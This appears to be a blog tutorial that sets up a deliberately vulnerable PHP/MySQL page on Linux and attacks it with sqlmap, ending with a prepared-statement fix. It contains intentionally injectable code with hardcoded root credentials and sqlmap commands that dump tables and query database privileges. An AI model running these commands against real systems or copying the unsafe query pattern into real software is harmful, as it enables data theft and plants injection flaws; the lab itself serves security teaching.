top of page
Search

From Install to Injection: Hands-on SQLMap Tutorial on Linux

Person using a computer in a dim server room, focused on SQLMap tutorial screen. Text reads "FROM INSTALL TO INJECTION" and "builddevops.com".

Disclaimer: This blog is strictly for educational and authorized security testing only. Always take written permission before testing any application. Unauthorized testing is illegal.

Introduction


SQL Injection is still one of the most common and dangerous web vulnerabilities. Even today, many internal tools, admin panels, and legacy applications are exposed due to weak input validation.

sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities. It supports almost all popular databases and comes with many advanced features.


In this blog, we will:

  • Set up a vulnerable remote server on RHEL/Rocky Linux

  • Install and configure MySQL + Apache + PHP

  • Create a deliberately vulnerable application

  • Perform step-by-step sqlmap scans

  • Understand sqlmap scan levels, risk, and techniques

  • Learn sqlmap output in simple language


Step 1: Prepare the Vulnerable Server


Install required packages

[root@siddhesh ~]# dnf install httpd php php-mysqlnd mariadb-server -y

Enable and start services:

[root@siddhesh ~]# systemctl enable --now httpd mariadb

Allow HTTP in firewall:

[root@siddhesh ~]# firewall-cmd --permanent --add-service=http
[root@siddhesh ~]# firewall-cmd --reload

Step 2: Configure MySQL Database


Secure initial setup:

[root@siddhesh ~]# mysql_secure_installation

Login to MySQL:

[root@siddhesh ~]# mysql -u root -p

Create database and table:

CREATE DATABASE builddevops;
USE builddevops;

CREATE TABLE users (
  id INT AUTO_INCREMENT PRIMARY KEY,
  username VARCHAR(50),
  password VARCHAR(50)
);

INSERT INTO users (username, password) VALUES
('admin','admin123'),
('john','john@123'),
('siddhesh','demo@123');
exit;

Exit MySQL.


Step 3: Create Vulnerable PHP Application


Create file:

[root@siddhesh ~]# vim /var/www/html/user.php

Vulnerable code (intentionally unsafe):

<?php
$conn = new mysqli("localhost","root","Build@123","builddevops");
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id=$id";
$result = $conn->query($query);
while($row = $result->fetch_assoc()){
  echo "User: ".$row['username']."<br>";
}
?>

Restart Apache:

[root@siddhesh ~]# systemctl restart httpd

Test in browser:

Sample output from my browser:


Web browser showing an insecure connection warning with the URL 13.228.29.70/user.php?id=3. The page displays the text "User: siddhesh."

Step 4: Install sqlmap (Attacker Side)


On another RHEL/Rocky or testing VM:

[root@siddhesh ~]# dnf install git python3 -y
[root@siddhesh ~]# git clone https://github.com/sqlmapproject/sqlmap.git
[root@siddhesh ~]# cd sqlmap

Run sqlmap:

[root@siddhesh ~]# python3 sqlmap.py --version

Step 5: Basic SQL Injection Detection


Target URL:

Basic scan:

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1"

What sqlmap does here:

  • Checks if parameter id is injectable

  • Tries boolean-based, error-based, and time-based injections

  • Automatically fingerprints the database


If vulnerable, sqlmap will say:

Parameter 'id' appears to be injectable
Text image shows SQL injection tests on a black background. Highlighted part notes GET parameter 'id' is vulnerable and injectable.

Step 6: Enumerating Database Information


Get database name

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" --dbs
SQLMAP

Get tables

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" -D builddevops --tables
SQLMAP

Get columns

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" -D builddevops -T users --columns
SQLMAP

Dump data

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" -D builddevops -T users --dump
SQLMAP


Step 7: Understanding --level and --risk


--level (1 to 5)


Controls how many parameters sqlmap tests.


  • Level 1: Basic GET/POST parameters

  • Level 3: Headers like User-Agent, Referer

  • Level 5: Cookies and deep testing


Example:

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" --level=5
SQLMAP

--risk (1 to 3)


Controls how aggressive payloads are.

  • Risk 1: Safe

  • Risk 2: Medium

  • Risk 3: Heavy queries (may affect DB)


Example:

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" --risk=3


Step 8: OS and DB Access


Get DB user

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" --current-user
SQLMAP

Get DB privileges

[root@siddhesh ~]# python3 sqlmap.py -u "http://SERVER-IP/user.php?id=1" --privileges

SQLMAP


Step 9: Best Practices


  • Never test production systems without approval

  • Start with low risk and level

  • Monitor DB load during testing

  • Use sqlmap logs for reports


How to Fix SQL Injection


Vulnerable code:

$query = "SELECT * FROM users WHERE id=$id";

Secure code:

$stmt = $conn->prepare("SELECT * FROM users WHERE id=?");
$stmt->bind_param("i", $id);
$stmt->execute();

Conclusion

sqlmap is a powerful tool when used responsibly. This hands-on lab on RHEL/Rocky/Kali Linux helps you understand how attackers think and how defenders should fix applications.




bottom of page